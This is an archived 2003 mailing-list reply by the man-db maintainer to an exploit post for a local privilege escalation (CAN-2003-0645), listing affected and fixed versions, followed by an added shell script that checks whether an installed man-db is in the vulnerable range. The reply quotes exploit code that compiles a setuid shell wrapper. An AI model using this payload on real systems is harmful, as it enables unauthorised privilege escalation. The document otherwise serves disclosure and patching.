Re: man-db[v2.4.1-]: open_cat_stream() privileged call exploit.

From: Colin Watson (cjwatsonat_private)
Date: Fri Aug 08 2003 - 03:19:07 PDT


    In article <20030806082358.2564.qmailat_private>, Vade 79 wrote:
    ># man-db[v2.4.1-]: local uid=man exploit.
    
    Correction: 2.3.12 (a beta release) and 2.3.18 to 2.4.1.
    
    >echo "[*] making runme, and mansh source files..."
    >cat <<EOF>runme.c
    >#include <stdio.h>
    >#include <stdlib.h>
    >#include <unistd.h>
    >#include <sys/types.h>
    >#include <sys/stat.h>
    >int main(int argc,char **argv){
    > setreuid(geteuid(),geteuid());
    > system("cc ${TMPDIR}/mansh.c -o ${TMPDIR}/mansh");
    > chmod("${TMPDIR}/mansh",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP);
    > unlink(argv[0]);
    > exit(0);
    >}
    >EOF
    >cat <<EOF>mansh.c
    >#include <stdio.h>
    >#include <sys/types.h>
    >#include <unistd.h>
    >int main(){
    > setreuid(geteuid(),geteuid());
    > execl("/bin/sh","sh",0);
    > exit(0);
    >}
    >EOF
    
    It can be done with a lot less effort and in about a tenth of the space
    without resorting to compiled code, but I'll leave that as an exercise
    for the reader ... :-)
    
    Anyway, Debian man-db 2.3.20-18.woody.2 (stable) and 2.4.1-12 (unstable)
    fix this. I'm working to release 2.4.2 as well. This is CAN-2003-0645.
    
    -- 
    Colin Watson                                       [cjwatsonat_private]
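An added check, not part of Colin Watson's reply or of man-db itself, that classifies an installed man-db version against the affected range named above (2.3.12, and 2.3.18 through 2.4.1) and notes whether the binary is privileged; the `man --version` output format it parses is an assumption.

```shell
#!/bin/sh
# Added example, not from the original post or from man-db: classify an
# upstream man-db version against the range given above (2.3.12, and 2.3.18
# through 2.4.1 inclusive). Debian's patched packages carry a Debian revision
# (2.3.20-18.woody.2, 2.4.1-12); this upstream-only check does not model
# that, so consult the distribution changelog for such packages.

# vercmp A B: print -1, 0 or 1 comparing dotted numeric versions.
vercmp() {
    a="$1"; b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        x="${a%%.*}"; y="${b%%.*}"
        [ -z "$x" ] && x=0
        [ -z "$y" ] && y=0
        if [ "$x" -lt "$y" ]; then echo -1; return; fi
        if [ "$x" -gt "$y" ]; then echo 1; return; fi
        case "$a" in *.*) a="${a#*.}" ;; *) a="" ;; esac
        case "$b" in *.*) b="${b#*.}" ;; *) b="" ;; esac
    done
    echo 0
}

# mandb_affected VERSION: exit 0 when VERSION lies in the affected range.
mandb_affected() {
    if [ "$1" = "2.3.12" ]; then return 0; fi
    if [ "$(vercmp "$1" 2.3.18)" -ge 0 ] && [ "$(vercmp "$1" 2.4.1)" -le 0 ]; then
        return 0
    fi
    return 1
}

# check_installed: report the installed man and whether it is setuid/setgid,
# since the bug only matters when man runs with elevated privilege (man-db
# installs it setuid to user "man"). Extracting the first dotted number from
# `man --version` is an assumption about its output format.
check_installed() {
    bin=$(command -v man) || { echo "man not installed"; return 0; }
    ver=$("$bin" --version 2>/dev/null | sed -n '1s/[^0-9]*\([0-9][0-9.]*\).*/\1/p')
    priv="not setuid/setgid"
    if [ -u "$bin" ] || [ -g "$bin" ]; then priv="setuid/setgid"; fi
    if mandb_affected "$ver"; then
        echo "man-db $ver at $bin: in affected range ($priv)"
    else
        echo "man-db $ver at $bin: outside affected range ($priv)"
    fi
}
```

Run `check_installed` on a host to get a one-line verdict; the range logic treats 2.3.13 to 2.3.17 and 2.4.2 onward as outside the range.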
    